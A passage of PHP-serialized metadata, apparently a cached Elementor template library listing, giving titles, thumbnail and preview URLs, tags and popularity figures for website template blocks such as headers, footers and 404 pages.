404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:405;s:16:\"popularity_index\";i:730;s:11:\"trend_index\";i:795;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:626;a:19:{s:4:\"tmpl\";i:979;s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Business\",\"Footer\",\"Interior Design\"]\";s:10:\"menu_order\";i:406;s:16:\"popularity_index\";i:322;s:11:\"trend_index\";i:178;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:627;a:19:{s:4:\"tmpl\";i:980;s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design &#8211; Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Business\",\"Header\",\"Interior Design\"]\";s:10:\"menu_order\";i:408;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:64;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:628;a:19:{s:4:\"tmpl\";i:977;s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design &#8211; News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:410;s:16:\"popularity_index\";i:436;s:11:\"trend_index\";i:132;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:629;a:19:{s:4:\"tmpl\";i:976;s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design &#8211; Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:413;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:108;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:630;a:19:{s:4:\"tmpl\";i:975;s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design &#8211; Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:414;s:16:\"popularity_index\";i:601;s:11:\"trend_index\";i:324;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:631;a:19:{s:4:\"tmpl\";i:1011;s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:416;s:16:\"popularity_index\";i:724;s:11:\"trend_index\";i:647;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:632;a:19:{s:4:\"tmpl\";i:1012;s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"Footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:419;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:238;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:633;a:19:{s:4:\"tmpl\";i:1013;s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese Restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"Header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:421;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:274;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:634;a:19:{s:4:\"tmpl\";i:914;s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:422;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:716;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:635;a:19:{s:4:\"tmpl\";i:913;s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm &#8211; Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:424;s:16:\"popularity_index\";i:431;s:11:\"trend_index\";i:294;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:636;a:19:{s:4:\"tmpl\";i:912;s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:425;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:240;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:637;a:19:{s:4:\"tmpl\";i:911;s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:427;s:16:\"popularity_index\";i:80;s:11:\"trend_index\";i:39;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:638;a:19:{s:4:\"tmpl\";i:910;s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm &#8211; Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:430;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:433;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:639;a:19:{s:4:\"tmpl\";i:909;s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:432;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:214;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:640;a:19:{s:4:\"tmpl\";i:1022;s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 page\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/07/404.png\";s:12:\"tmpl_created\";i:1595315728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/luxury-real-estate-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:433;s:16:\"popularity_index\";i:759;s:11:\"trend_index\";i:720;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:641;a:19:{s:4:\"tmpl\";i:1023;s:2:\"id\";i:14779;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Footer.png\";s:12:\"tmpl_created\";i:1595315743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Footer\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:434;s:16:\"popularity_index\";i:536;s:11:\"trend_index\";i:505;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:642;a:19:{s:4:\"tmpl\";i:1024;s:2:\"id\";i:14790;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Header.png\";s:12:\"tmpl_created\";i:1595315760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Header\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:436;s:16:\"popularity_index\";i:101;s:11:\"trend_index\";i:157;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:643;a:19:{s:4:\"tmpl\";i:1026;s:2:\"id\";i:14809;s:5:\"title\";s:45:\"Luxury Real Estate &#8211; Properties Archive\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Properties.png\";s:12:\"tmpl_created\";i:1595315826;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/blocks/luxury-real-estate-properties-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:438;s:16:\"popularity_index\";i:414;s:11:\"trend_index\";i:420;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:644;a:19:{s:4:\"tmpl\";i:1027;s:2:\"id\";i:14816;s:5:\"title\";s:47:\"Luxury Real Estate &#8211; Property single post\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/07/Single-Property-.png\";s:12:\"tmpl_created\";i:1595315847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/blocks/luxury-real-estate-property-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:441;s:16:\"popularity_index\";i:541;s:11:\"trend_index\";i:665;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:645;a:19:{s:4:\"tmpl\";i:1025;s:2:\"id\";i:14799;s:5:\"title\";s:38:\"Luxury Real Estate &#8211; single post\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Post.png\";s:12:\"tmpl_created\";i:1595315792;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/luxury-real-estate-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:442;s:16:\"popularity_index\";i:369;s:11:\"trend_index\";i:441;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:646;a:19:{s:4:\"tmpl\";i:950;s:2:\"id\";i:12635;s:5:\"title\";s:20:\"Magazine &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/01/404_s.png\";s:12:\"tmpl_created\";i:1579060746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/magazine-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:25:\"[\"404\",\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:445;s:16:\"popularity_index\";i:645;s:11:\"trend_index\";i:734;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:647;a:19:{s:4:\"tmpl\";i:949;s:2:\"id\";i:12643;s:5:\"title\";s:24:\"Magazine &#8211; Archiv1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv1_s.png\";s:12:\"tmpl_created\";i:1579060737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/magazine-archiv1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:447;s:16:\"popularity_index\";i:346;s:11:\"trend_index\";i:272;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:648;a:19:{s:4:\"tmpl\";i:946;s:2:\"id\";i:12669;s:5:\"title\";s:23:\"Magazine &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Footer_s.png\";s:12:\"tmpl_created\";i:1579060715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:28:\"[\"Blog\",\"Footer\",\"Magazine\"]\";s:10:\"menu_order\";i:448;s:16:\"popularity_index\";i:442;s:11:\"trend_index\";i:349;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:649;a:19:{s:4:\"tmpl\";i:945;s:2:\"id\";i:12678;s:5:\"title\";s:23:\"Magazine &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-magazine.png\";s:12:\"tmpl_created\";i:1579060701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:28:\"[\"Blog\",\"Header\",\"Magazine\"]\";s:10:\"menu_order\";i:450;s:16:\"popularity_index\";i:295;s:11:\"trend_index\";i:197;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:650;a:19:{s:4:\"tmpl\";i:947;s:2:\"id\";i:12661;s:5:\"title\";s:23:\"Magazine &#8211; Search\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Search_s.png\";s:12:\"tmpl_created\";i:1579060722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-search/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:452;s:16:\"popularity_index\";i:396;s:11:\"trend_index\";i:509;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:651;a:19:{s:4:\"tmpl\";i:944;s:2:\"id\";i:12688;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 1\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post2_s.png\";s:12:\"tmpl_created\";i:1579060692;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:453;s:16:\"popularity_index\";i:342;s:11:\"trend_index\";i:175;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:652;a:19:{s:4:\"tmpl\";i:943;s:2:\"id\";i:12699;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 2\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post3_s.png\";s:12:\"tmpl_created\";i:1579060680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:454;s:16:\"popularity_index\";i:348;s:11:\"trend_index\";i:129;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:653;a:19:{s:4:\"tmpl\";i:942;s:2:\"id\";i:12707;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post1_s.png\";s:12:\"tmpl_created\";i:1579060669;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:457;s:16:\"popularity_index\";i:476;s:11:\"trend_index\";i:246;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:654;a:19:{s:4:\"tmpl\";i:941;s:2:\"id\";i:12716;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post4_s.png\";s:12:\"tmpl_created\";i:1579060659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/magazine-single-post-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:459;s:16:\"popularity_index\";i:513;s:11:\"trend_index\";i:489;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:655;a:19:{s:4:\"tmpl\";i:948;s:2:\"id\";i:12652;s:5:\"title\";s:17:\"Magazine- 